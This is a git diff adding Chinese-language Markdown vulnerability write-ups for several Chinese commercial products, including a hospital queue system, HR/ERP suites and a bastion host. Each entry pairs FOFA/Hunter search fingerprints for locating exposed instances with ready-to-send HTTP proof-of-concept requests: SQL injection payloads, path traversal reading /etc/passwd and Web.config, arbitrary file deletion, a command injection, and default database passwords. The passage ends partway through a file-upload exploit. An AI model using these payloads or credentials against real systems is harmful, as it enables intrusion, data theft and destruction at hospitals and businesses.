+![1714376846432-84b8855e-e49d-4973-8c28-ba25be967542.png](./img/EDqPjrxaNQ226zBw/1714376846432-84b8855e-e49d-4973-8c28-ba25be967542-004033.png)
+
+![1714376879554-f02e9a26-6b0f-4667-b1a4-ce2be9ad7a37.png](./img/EDqPjrxaNQ226zBw/1714376879554-f02e9a26-6b0f-4667-b1a4-ce2be9ad7a37-313663.png)
+
+
+
+> 更新: 2024-06-17 09:27:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pg1gauagl9lnp79z>
\ No newline at end of file
diff --git a/心医国际排队叫号系统SQL注入漏洞.md b/心医国际排队叫号系统SQL注入漏洞.md
new file mode 100644
index 0000000..ae3850f
--- /dev/null
+++ b/心医国际排队叫号系统SQL注入漏洞.md
@@ -0,0 +1,32 @@
+# 心医国际排队叫号系统SQL注入漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商，铺建并运营全国领先的智能医疗云平台，依托十年的数据积累和业务实践，持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度，助力政府、医院及产业合作伙伴，打造线上线下高效协同的智慧医疗健康服务体系，目前已建成覆盖全国31个省，联结2万余家医疗机构的智能医疗云平台，助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台，服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心医国际排队叫号系统存在SQL注入漏洞，攻击者可通过该漏洞获取系统敏感信息  
+</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际排队叫号系统</font>
+
+![1714370816089-16a52d5d-c05c-428d-b89c-edb192fe6512.png](./img/s5tva-HDWfzF2MGk/1714370816089-16a52d5d-c05c-428d-b89c-edb192fe6512-526235.png)<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>**
+
+```plain
+POST /showqueue/showqueue/patient/queryQueueInfo HTTP/1.1
+Host: 
+Accept: application/json, text/javascript, */*; q=0.01
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Length: 104
+
+patientstatus=&queueID=&department=&waitarea=&name=&startTime=&endTime=&curPage=0&queueNumber=&operator=
+```
+
+![1714374261063-c303ed6b-542b-49e7-b544-24d37b429933.png](./img/s5tva-HDWfzF2MGk/1714374261063-c303ed6b-542b-49e7-b544-24d37b429933-518638.png)
+
+
+
+
+
+> 更新: 2024-06-17 09:27:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aa43lw54m4qgvg9s>
\ No newline at end of file
diff --git a/心医国际排队叫号系统敏感信息泄露.md b/心医国际排队叫号系统敏感信息泄露.md
new file mode 100644
index 0000000..05ab6f1
--- /dev/null
+++ b/心医国际排队叫号系统敏感信息泄露.md
@@ -0,0 +1,45 @@
+# 心医国际排队叫号系统敏感信息泄露
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商，铺建并运营全国领先的智能医疗云平台，依托十年的数据积累和业务实践，持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度，助力政府、医院及产业合作伙伴，打造线上线下高效协同的智慧医疗健康服务体系，目前已建成覆盖全国31个省，联结2万余家医疗机构的智能医疗云平台，助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台，服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心医国际排队叫号系统存在未授权敏感信息泄露漏洞，攻击者可通过该漏洞获取系统敏感信息  
+</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际排队叫号系统</font>
+
+![1714370825066-6953c7f5-fa94-4329-b1ec-f8ee12ee1f5c.png](./img/xLWT12YcmtcwVbvt/1714370825066-6953c7f5-fa94-4329-b1ec-f8ee12ee1f5c-885150.png)<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>**
+
+```plain
+POST /showqueue/showqueue/patient/queryQueueInfo HTTP/1.1
+Host: 
+Accept: application/json, text/javascript, */*; q=0.01
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Length: 104
+
+patientstatus=&queueID=&department=&waitarea=&name=&startTime=&endTime=&curPage=0&queueNumber=&operator=
+```
+
+![1714361218056-eb624f8f-9644-4667-a379-e627e7f218c1.png](./img/xLWT12YcmtcwVbvt/1714361218056-eb624f8f-9644-4667-a379-e627e7f218c1-200892.png)
+
+```plain
+POST /showqueue/showqueue/patient/statusUpdate HTTP/1.1
+Host: 
+Content-Length: 32
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Connection: close
+
+cardNo=1&cardType=out&socialNo=1
+```
+
+![1714374318126-38b39263-2da1-46fa-b16e-a346a57d686a.png](./img/xLWT12YcmtcwVbvt/1714374318126-38b39263-2da1-46fa-b16e-a346a57d686a-495915.png)
+
+
+
+> 更新: 2024-06-17 09:27:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/so6gdl84a7wk9snw>
\ No newline at end of file
diff --git a/心医国际系统数据库默认口令.md b/心医国际系统数据库默认口令.md
new file mode 100644
index 0000000..7a182d9
--- /dev/null
+++ b/心医国际系统数据库默认口令.md
@@ -0,0 +1,19 @@
+# 心医国际系统数据库默认口令
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商，铺建并运营全国领先的智能医疗云平台，依托十年的数据积累和业务实践，持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度，助力政府、医院及产业合作伙伴，打造线上线下高效协同的智慧医疗健康服务体系，目前已建成覆盖全国31个省，联结2万余家医疗机构的智能医疗云平台，助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台，服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际系统数据库存在默认口令  
+</font>**<font style="color:rgb(38, 38, 38);">二、漏洞复现</font>**
+
+```plain
+oracle数据库：xepacs/another（orcl）
+sqlserver数据库：sa/another
+```
+
+![1714394515761-3500d3c2-8ef1-4672-a9be-207bac99712c.png](./img/p7DXMP3msAqIoeoq/1714394515761-3500d3c2-8ef1-4672-a9be-207bac99712c-377727.png)
+
+
+
+
+
+> 更新: 2024-06-17 09:27:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/os28kxppl3ce8em7>
\ No newline at end of file
diff --git a/志华软件openfile.aspx存在任意文件读取漏洞.md b/志华软件openfile.aspx存在任意文件读取漏洞.md
new file mode 100644
index 0000000..b73ec00
--- /dev/null
+++ b/志华软件openfile.aspx存在任意文件读取漏洞.md
@@ -0,0 +1,24 @@
+# 志华软件openfile.aspx存在任意文件读取漏洞
+
+志华软件openfile.aspx存在任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## fofa
+
+```javascript
+body="b28web/Utility/"
+```
+
+## poc
+
+```javascript
+GET /oa/isprit/module/openfile.aspx?Url=..\..\..\Web.config HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Cookie: ASP.NET_SessionId=vu5fjewt125x2erxrujcfj4p
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+```
+
diff --git a/快云服务器助手GetDetail任意文件读取漏洞.md b/快云服务器助手GetDetail任意文件读取漏洞.md
new file mode 100644
index 0000000..8ba4e5d
--- /dev/null
+++ b/快云服务器助手GetDetail任意文件读取漏洞.md
@@ -0,0 +1,25 @@
+# 快云服务器助手GetDetail任意文件读取漏洞
+
+快云服务器助手 filemana.aspx/GetDetail 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件。
+
+## fofa
+
+```javascript
+title="快云服务器助手"
+```
+
+## poc
+```javascript
+POST /FileMenu/filemana.aspx/GetDetail HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/json; charset=utf-8
+Connection: keep-alive
+
+{"fpath":"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows/win.ini"}
+```
+
+![image-20250103184809531](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031848603.png)
\ No newline at end of file
diff --git a/快普M6SalaryAccounting存在SQL注入漏洞.md b/快普M6SalaryAccounting存在SQL注入漏洞.md
new file mode 100644
index 0000000..8e5e368
--- /dev/null
+++ b/快普M6SalaryAccounting存在SQL注入漏洞.md
@@ -0,0 +1,102 @@
+# 快普M6 SalaryAccounting存在SQL注入漏洞
+
+# 一、漏洞简介
+快普软件是一款综合性的企业管理软件，它涵盖了财务管理、人力资源管理、供应链管理、生产制造等多个方面。该软件以强大的功能和灵活性著称，能够满足不同企业的个性化需求。通过快普软件，企业可以更加高效地管理财务、人事、供应链和生产制造等各个环节，实现业务流程的优化和协同。同时，该软件还支持移动办公，方便企业随时随地进行业务处理和管理。总之，快普软件是一款功能强大、易于使用的企业管理软件，能够帮助企业提高运营效率和管理水平。快普M6 SalaryAccounting存在SQL注入漏洞
+
+# 二、影响版本
++ 快普M6
+
+# 三、资产测绘
++ hunter`web.body="Resource/JavaScript/jKPM6.DateTime.js"`
++ 特征
+
+![1705249287850-2f1dd538-9c9e-43e0-8f03-a723c6834643.png](./img/tdsklyiA1YTnWaRM/1705249287850-2f1dd538-9c9e-43e0-8f03-a723c6834643-967314.png)
+
+# 四、漏洞复现
+```plain
+POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ASP.NET_SessionId=ecch4oew21q5s0d51waneyy4; http125331972318088ValidateCode=R3QT; iKey=IKEY%u8BBE%u5907%u672A%u8FDE%u63A5%uFF01; 3AB9D23F7A4B3C9B=SBQRZJN2EF2QXSSFYFPPHI2BQKRWRME2QTFR4O4VYZ6RCBPIITHTHMWYA7BD64AND5HUIK7NAXNV7BNTBM2SITFE7M; eid=SBQRZJN2EF2QXSSFYFPPHI2BQKRWRME2QTFR4O4VYZ6RCBPIITHTHMWYA7BD64AND5HUIK7NAXNV7BNTBM2SITFE7M
+Upgrade-Insecure-Requests: 1
+SOAPAction: http://tempuri.org/Calculate
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 1112
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
+ <soapenv:Header/>
+ <soapenv:Body>
+   <tem:Calculate>
+    <!--type: string-->
+    <tem:SalaryCategory></tem:SalaryCategory>
+    <!--type: string-->
+    <tem:StaffBirthDay></tem:StaffBirthDay>
+    <!--type: string-->
+    <tem:staffId>
+    1) UNION ALL SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(70)+CHAR(108)+CHAR(70)+CHAR(75)+CHAR(107)+CHAR(66)+CHAR(112)+CHAR(72)+CHAR(110)+CHAR(75)+CHAR(98)+CHAR(74)+CHAR(67)+CHAR(79)+CHAR(115)+CHAR(108)+CHAR(67)+CHAR(75)+CHAR(98)+CHAR(68)+CHAR(100)+CHAR(84)+CHAR(98)+CHAR(112)+CHAR(121)+CHAR(101)+CHAR(105)+CHAR(99)+CHAR(66)+CHAR(79)+CHAR(110)+CHAR(83)+CHAR(69)+CHAR(90)+CHAR(89)+CHAR(102)+CHAR(105)+CHAR(70)+CHAR(106)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113)-- PCzU</tem:staffId>
+    <!--type: string-->
+    <tem:Department></tem:Department>
+    <!--type: string-->
+    <tem:SubOrg></tem:SubOrg>
+    <!--type: string-->
+    <tem:taxMonthly></tem:taxMonthly>
+   </tem:Calculate>
+ </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1705249349087-7137453d-e7dd-403d-bc71-430489a4605c.png](./img/tdsklyiA1YTnWaRM/1705249349087-7137453d-e7dd-403d-bc71-430489a4605c-387969.png)
+
+```plain
+qbbqqOFlFKkBpHnKbJCOslCKbDdTbpyeicBOnSEZYfiFjqbpbq
+```
+
+sqlmap
+
+```plain
+POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ASP.NET_SessionId=ecch4oew21q5s0d51waneyy4; http125331972318088ValidateCode=R3QT; iKey=IKEY%u8BBE%u5907%u672A%u8FDE%u63A5%uFF01; 3AB9D23F7A4B3C9B=SBQRZJN2EF2QXSSFYFPPHI2BQKRWRME2QTFR4O4VYZ6RCBPIITHTHMWYA7BD64AND5HUIK7NAXNV7BNTBM2SITFE7M; eid=SBQRZJN2EF2QXSSFYFPPHI2BQKRWRME2QTFR4O4VYZ6RCBPIITHTHMWYA7BD64AND5HUIK7NAXNV7BNTBM2SITFE7M
+Upgrade-Insecure-Requests: 1
+SOAPAction: http://tempuri.org/Calculate
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 1112
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
+ <soapenv:Header/>
+ <soapenv:Body>
+   <tem:Calculate>
+    <!--type: string-->
+    <tem:SalaryCategory></tem:SalaryCategory>
+    <!--type: string-->
+    <tem:StaffBirthDay></tem:StaffBirthDay>
+    <!--type: string-->
+    <tem:staffId>
+    1)
+    </tem:staffId>
+    <!--type: string-->
+    <tem:Department></tem:Department>
+    <!--type: string-->
+    <tem:SubOrg></tem:SubOrg>
+    <!--type: string-->
+    <tem:taxMonthly></tem:taxMonthly>
+   </tem:Calculate>
+ </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1705249400842-6d4244a7-09d1-4ed5-bea6-da016500b707.png](./img/tdsklyiA1YTnWaRM/1705249400842-6d4244a7-09d1-4ed5-bea6-da016500b707-009540.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yogdi0xnw4pvfsfa>
\ No newline at end of file
diff --git a/快递微信小程序系统存在前台任意文件删除漏洞.md b/快递微信小程序系统存在前台任意文件删除漏洞.md
new file mode 100644
index 0000000..ca07887
--- /dev/null
+++ b/快递微信小程序系统存在前台任意文件删除漏洞.md
@@ -0,0 +1,36 @@
+# 快递微信小程序系统controller任意文件删除漏洞
+
+快递微信小程序系统 controller 接口存在任意文件删除漏洞，未经身份验证攻击者可通过该漏洞删除系统文件。
+
+## fofa
+
+```javascript
+body="/static/default/newwap/lang/js/jquery.localize.min.js"
+```
+
+## poc
+
+```javascript
+POST /public/qiniu_ueditor/php/controller.php?action=remove HTTP/2
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: max-age=0
+Content-Length: 14
+Content-Type: application/x-www-form-urlencoded
+Cookie: think_var=zh-cn; PHPSESSID=5cg6kramfusrb94homfj2q7ku1; thinkphp_show_page_trace=0|0; admin=think%3A%7B%22admin_id%22%3A%221%22%2C%22type%22%3A%221%22%2C%22user_id%22%3A%221%22%2C%22username%22%3A%22admin%22%2C%22password%22%3A%2221232f297a57a5a743894a0e4a801fc3%22%2C%22role_id%22%3A%221%22%2C%22city_id%22%3A0%2C%22area_id%22%3A0%2C%22business_id%22%3A0%2C%22mobile%22%3A%2218888888888%22%2C%22lock_admin_mum%22%3A0%2C%22is_lock%22%3A%221%22%2C%22is_admin_lock%22%3A0%2C%22is_admin_lock_time%22%3A0%2C%22create_time%22%3A%221497679379%22%2C%22create_ip%22%3A%2227.13.26.84%22%2C%22last_time%22%3A%221603174799%22%2C%22last_ip%22%3A%2249.118.246.1%22%2C%22is_ip%22%3A0%2C%22is_username_lock%22%3A0%2C%22closed%22%3A0%2C%22role_name%22%3A%22%25E5%2585%25AC%25E5%258F%25B8%25E6%2580%25BB%25E9%2583%25A8%22%7D
+Origin: http://127.0.0.1
+Referer: http://127.0.0.1/public/qiniu_ueditor/php/controller.php?action=remove
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Sec-Ch-Ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Sec-Fetch-User: ?1
+
+key=./test.png
+```
diff --git a/快递微信小程序系统存在前台任意文件读取漏洞.md b/快递微信小程序系统存在前台任意文件读取漏洞.md
new file mode 100644
index 0000000..4c565b2
--- /dev/null
+++ b/快递微信小程序系统存在前台任意文件读取漏洞.md
@@ -0,0 +1,41 @@
+# 快递微信小程序系统存在前台任意文件读取漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.84);">快递 微信小程序只系统是基于微信平台开发的轻量级应用，用户无需下载额外的APP，即可在微信内直接使用小程序进行快递操作。该系统集成了多项功能，实现了从寄件下单、物流跟踪到支付结算等全链条的快递服务，极大地提高了用户的便捷性和使用体验。、快递微信小程序系统 htpRequest 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件件、系统配置文件))、数据库配置文件等等，导致网站处于极度不安全状态。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>
++ 快递微信小程序系统
+
+# 三、资产测绘
+```plain
+body="static/default/newwap/lang/js/jquery.localize.min.js"
+```
+
+![1730457310265-b879e78b-33fb-46fb-bd72-615836037832.png](./img/vmzVTMljI6tdu2He/1730457310265-b879e78b-33fb-46fb-bd72-615836037832-114887.png)
+
+# 四、漏洞复现
+```plain
+GET /weixin/index/httpRequest?url=file:///etc/passwd HTTP/2
+Host: 
+Cookie: think_var=zh-cn; PHPSESSID=6igfjn7ik5nrk3bjc0i25ek357
+Cache-Control: max-age=0
+Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![1730457254704-754bdc13-ed5a-4445-b048-7cb49eed50de.png](./img/vmzVTMljI6tdu2He/1730457254704-754bdc13-ed5a-4445-b048-7cb49eed50de-338272.png)
+
+
+
+> 更新: 2024-11-27 10:00:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/io075rmp08qw1kf6>
\ No newline at end of file
diff --git a/思普企业运营管理平台apilogin存在SQL注入漏洞.md b/思普企业运营管理平台apilogin存在SQL注入漏洞.md
new file mode 100644
index 0000000..ae53340
--- /dev/null
+++ b/思普企业运营管理平台apilogin存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 思普企业运营管理平台apilogin存在SQL注入漏洞
+
+思普企业运营管理平台是一款专为企业提供全方位运营管理解决方案的软件平台，旨在帮助企业实现运营流程的可视化、自动化和协同化管理，提升运营效率和管理水平。平台集成了多个功能模块，包括人力资源管理、财务管理、供应链管理、销售管理、项目管理等，通过集成各个部门功能模块，形成企业运营管理的全面解决方案。企业可以根据实际需求选择安装相应的模块，实现企业内部各个环节的协同管理。
+
+## fofa
+
+```javascript
+icon_hash="-403479360"
+```
+
+## poc
+
+```javascript
+POST /IdsCenter/idsCheck?p=apilogin HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+X-Requested-With: XMLHttpRequest
+
+seqid=1%27+AND+6884+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%286884%3D6884%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29--+cxaC&datasource=EOMP1
+```
+
+![image-20241128094626617](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280946689.png)
\ No newline at end of file
diff --git a/思福迪运维安全管理系统GetCaCert存在任意文件读取漏洞.md b/思福迪运维安全管理系统GetCaCert存在任意文件读取漏洞.md
new file mode 100644
index 0000000..ad0b5c7
--- /dev/null
+++ b/思福迪运维安全管理系统GetCaCert存在任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 思福迪运维安全管理系统 GetCaCert存在任意文件读取漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(0, 0, 0);">为满足用户对加强内部运维安全审计日益迫切的需要，杭州思福迪信息技术有限公司依托自身强大的研发能力，丰富的行业经验，自主研发了新一代软硬件一体化运维安全专用审计系统——Logbase运维安全管理系统。该系统支持对企业内部人员的维护行为进行全面的管理、审计，消除了传统审计系统中的盲点，使企业对运维人员的操作过程，能做到事前防范、事中控制、事后审计的能力，是企业IT内控最有效的运维管理平台。思福迪运维安全管理系统 GetCaCert存在任意文件读取漏洞。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 思福迪运维安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="Logbase 思福迪 运维安全系统"`
++ 特征
+
+![1705244115545-ef7957e0-49a0-446a-af00-94cbec4e0d11.png](./img/q1E9jTVPnh7ZkQF_/1705244115545-ef7957e0-49a0-446a-af00-94cbec4e0d11-586111.png)
+
+# 四、漏洞复现
+```plain
+GET /bhost/GetCaCert?a1=../../../../../etc/hosts HTTP/1.1
+Host: 
+Connection: close
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: gzip
+Accept-Encoding: gzip, deflate, br
+Content-Length: 0
+```
+
+![1705244843495-07e1b54b-81e9-4119-8b8f-0af9b5fdba17.png](./img/q1E9jTVPnh7ZkQF_/1705244843495-07e1b54b-81e9-4119-8b8f-0af9b5fdba17-171121.png)
+
+![1705244860034-ecd21dc6-093f-4b2e-b277-97580ea1b8db.png](./img/q1E9jTVPnh7ZkQF_/1705244860034-ecd21dc6-093f-4b2e-b277-97580ea1b8db-040679.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wuf31x217y4a3dvr>
\ No newline at end of file
diff --git a/思福迪运维安全管理系统test_qrcode_b存在远程命令执行漏洞.md b/思福迪运维安全管理系统test_qrcode_b存在远程命令执行漏洞.md
new file mode 100644
index 0000000..9d440bd
--- /dev/null
+++ b/思福迪运维安全管理系统test_qrcode_b存在远程命令执行漏洞.md
@@ -0,0 +1,36 @@
+# 思福迪运维安全管理系统 test_qrcode_b存在远程命令执行漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(0, 0, 0);">为满足用户对加强内部运维安全审计日益迫切的需要，杭州思福迪信息技术有限公司依托自身强大的研发能力，丰富的行业经验，自主研发了新一代软硬件一体化运维安全专用审计系统——Logbase运维安全管理系统。该系统支持对企业内部人员的维护行为进行全面的管理、审计，消除了传统审计系统中的盲点，使企业对运维人员的操作过程，能做到事前防范、事中控制、事后审计的能力，是企业IT内控最有效的运维管理平台。思福迪运维安全管理系统 test_qrcode_b存在远程命令执行漏洞，未经身份认证得攻击者可以通过此漏洞执行任意指令，造成服务器失陷。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 思福迪运维安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="Logbase 思福迪 运维安全系统"`
++ 特征
+
+![1705244115545-ef7957e0-49a0-446a-af00-94cbec4e0d11.png](./img/ADIpIBPu5hmcUuwL/1705244115545-ef7957e0-49a0-446a-af00-94cbec4e0d11-969584.png)
+
+# 四、漏洞复现
+`referer`头不能删除
+
+```plain
+POST /bhost/test_qrcode_b HTTP/1.1
+Host: 
+User-Agent: Go-http-client/1.1
+Content-Length: 23
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Referer: 
+
+z1=1&z2="|id;"&z3=bhost
+```
+
+![]()
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cwhyqkk2t3hh660w>
\ No newline at end of file
diff --git a/思迅商旗商业管理系统10SetAiPosItemImage存在任意文件上传漏洞.md b/思迅商旗商业管理系统10SetAiPosItemImage存在任意文件上传漏洞.md
new file mode 100644
index 0000000..a0fdd3d
--- /dev/null
+++ b/思迅商旗商业管理系统10SetAiPosItemImage存在任意文件上传漏洞.md
@@ -0,0 +1,91 @@
+# 思迅商旗商业管理系统10 SetAiPosItemImage存在任意文件上传漏洞
+
+# 一、漏洞简介
+思迅商旗商业管理系统是基于互联网部署的全新零售管理系统。提炼各架构优势之大成，打造全新互联网产品。思思迅商旗商业管理系统7 SetAiPosItemImage存在任意文件上传漏洞。
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 思迅商旗商业管理系统10
+
+# 三、资产测绘
++ hunter`app.name=="思迅商旗"`
++ 特征![1705135226264-0d5d4bd8-f3f8-4e10-a2da-14519b7ffa05.png](./img/EYVidbNdF5vXvYpz/1705135226264-0d5d4bd8-f3f8-4e10-a2da-14519b7ffa05-398111.png)
+
+# 四、漏洞复现
+```plain
+POST /api/POS/SetAiPosItemImage HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
+Content-Length: 416
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/json
+Upgrade-Insecure-Requests: 1
+x-forwarded-for: 127.0.0.1
+
